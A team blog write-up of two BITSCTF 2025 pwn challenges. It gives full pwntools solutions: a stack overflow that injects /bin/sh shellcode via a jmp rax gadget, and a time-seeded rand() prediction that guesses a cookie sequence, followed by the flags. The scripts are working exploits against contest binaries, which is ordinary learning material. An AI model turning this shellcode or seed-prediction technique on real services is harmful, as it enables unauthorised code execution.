team-logo
Published on

BITSCTF 2025 - PWN challenges

Authors

Introduction

There were only two problems that we managed to solve. They were very similar, just like in other competitions.

Table of contents

Baby PWN

baby pwn

Simple task with stack.

Checking:

#checksec --file=./main 
[*] 
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x400000)
    Stack:      Executable
    RWX:        Has RWX segments
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No

Solution:


from pwn import *             

context.update(arch='x86_64', os='linux') 
context.terminal = ['wt.exe','wsl.exe'] 

HOST="nc 20.244.40.210 6001"
ADDRESS,PORT=HOST.split()[1:]

BINARY_NAME="./main"
binary = context.binary = ELF(BINARY_NAME, checksec=False)

if args.REMOTE:
    p = remote(ADDRESS,PORT)
else:
    p = process(binary.path)    

length=112+8

shellcode=b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
jmp_rax=0x00000000004010ac


payload=shellcode+(length-len(shellcode))*b'A'+p64(jmp_rax)
p.sendline(payload)
p.interactive()

Flag: BITSCTF{w3lc0m3_70_7h3_w0rld_0f_b1n4ry_3xpl01t4t10n_ec5d9205}

Biscuits

Biscuits

This task was almost identical to Mr Unlucky from Nullcon Goa HackIM 2025 CTF. The only difference was that instead of characters (Polvor\xc3\xb3n), there were cookies, their quantity, and the difficulty in encoding characters.

Checking:

    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No

Solution:

from pwn import *             

import ctypes
import time
import time

#context.log_level='debug'  
# Importujemy libc
libc = ctypes.CDLL("libc.so.6")

context.update(arch='x86_64', os='linux') 
context.terminal = ['wt.exe','wsl.exe'] 

HOST="nc 20.244.40.210 6000"
ADDRESS,PORT=HOST.split()[1:]

BINARY_NAME="./main"
#BINARY_NAME="./mr_unlucky_0_sleep"
binary = context.binary = ELF(BINARY_NAME, checksec=False)

if args.REMOTE:
    p = remote(ADDRESS,PORT)
else:
    p = process(binary.path)    

cookies= [b'Chocolate Chip', b'Sugar Cookie', b'Oatmeal Raisin', b'Peanut Butter', 
          b'Snickerdoodle', b'Shortbread', b'Gingerbread', b'Macaron', b'Macaroon', 
          b'Biscotti', b'Butter Cookie', b'White Chocolate Macadamia Nut', b'Double Chocolate Chip', 
          b'M&M Cookie', b'Lemon Drop Cookie', b'Coconut Cookie', b'Almond Cookie', 
          b'Thumbprint Cookie', b'Fortune Cookie', b'Black and White Cookie', b'Molasses Cookie', 
          b'Pumpkin Cookie', b'Maple Cookie', b'Espresso Cookie', b'Red Velvet Cookie', b'Funfetti Cookie', 
          b'S\'mores Cookie', b'Rocky Road Cookie', b'Caramel Apple Cookie', b'Banana Bread Cookie', 
          b'Zucchini Cookie', b'Matcha Green Tea Cookie', b'Chai Spice Cookie', b'Lavender Shortbread', 
          b'Earl Grey Tea Cookie', b'Pistachio Cookie', b'Hazelnut Cookie', b'Pecan Sandies', b'Linzer Cookie',
          b'Spritz Cookie', b'Russian Tea Cake', b'Anzac Biscuit', b'Florentine Cookie', b'Stroopwafel', 
          b'Alfajores', b'Polvor\xc3\xb3n', b'Springerle', b'Pfeffern\xc3\xbcsse', b'Speculoos', b'Kolaczki', b'Rugelach', 
          b'Hamantaschen', b'Mandelbrot', b'Koulourakia', b'Melomakarona', b'Kourabiedes', b'Pizzelle', b'Amaretti', 
          b'Cantucci', b'Savoiardi (Ladyfingers)', b'Madeleine', b'Palmier', b'Tuile', b'Langue de Chat', 
          b'Viennese Whirls', b'Empire Biscuit', b'Jammie Dodger', b'Digestive Biscuit', b'Hobnob', b'Garibaldi Biscuit', 
          b'Bourbon Biscuit', b'Custard Cream', b'Ginger Nut', b'Nice Biscuit', b'Shortcake', b'Jam Thumbprint', 
          b'Coconut Macaroon', b'Chocolate Crinkle', b'Pepparkakor', b'Sandbakelse', b'Krumkake', b'Rosette Cookie',
          b'Pinwheel Cookie', b'Checkerboard Cookie', b'Rainbow Cookie', b'Mexican Wedding Cookie', 
          b'Snowball Cookie', b'Cranberry Orange Cookie', b'Pumpkin Spice Cookie', b'Cinnamon Roll Cookie', 
          b'Chocolate Hazelnut Cookie', b'Salted Caramel Cookie', 
          b'Toffee Crunch Cookie', b'Brownie Cookie', b'Cheesecake Cookie', b'Key Lime Cookie', b'Blueberry Lemon Cookie', b'Raspberry Almond Cookie', b'Strawberry Shortcake Cookie', b'Neapolitan Cookie']

def predict_cookies_from_timestamp(timestamp, count=100):
    libc.srand(ctypes.c_uint(timestamp))  # Ustawiamy seed jako unsigned int
    cookie_sequence = []
    for _ in range(count):
        cookie_index = libc.rand() % len(cookies)
        cookie_sequence.append(cookies[cookie_index])
        print (cookie_sequence)
    return cookie_sequence


current_time = int(time.time())
predicted_cookies=predict_cookies_from_timestamp(current_time)    

#p.recvuntil(b'Guess the cookie:',timeout=3)

for i,cookie in enumerate(predicted_cookies):
    p.clean ()  
    p.sendline(cookie)
    try:
        recv=p.recv(timeout=3)
    except:
        pass
        print("error")
    if b'Wrong' in recv:
        print ("error")
        break
    warn (f"Attempt: {i}")
    #time.sleep(0.3)
    
p.interactive()

Flag: BITSCTF{7h4nk5_f0r_4ll_0f_th3_c00ki3s_1_r34lly_enjoy3d_th3m_d31fa51e}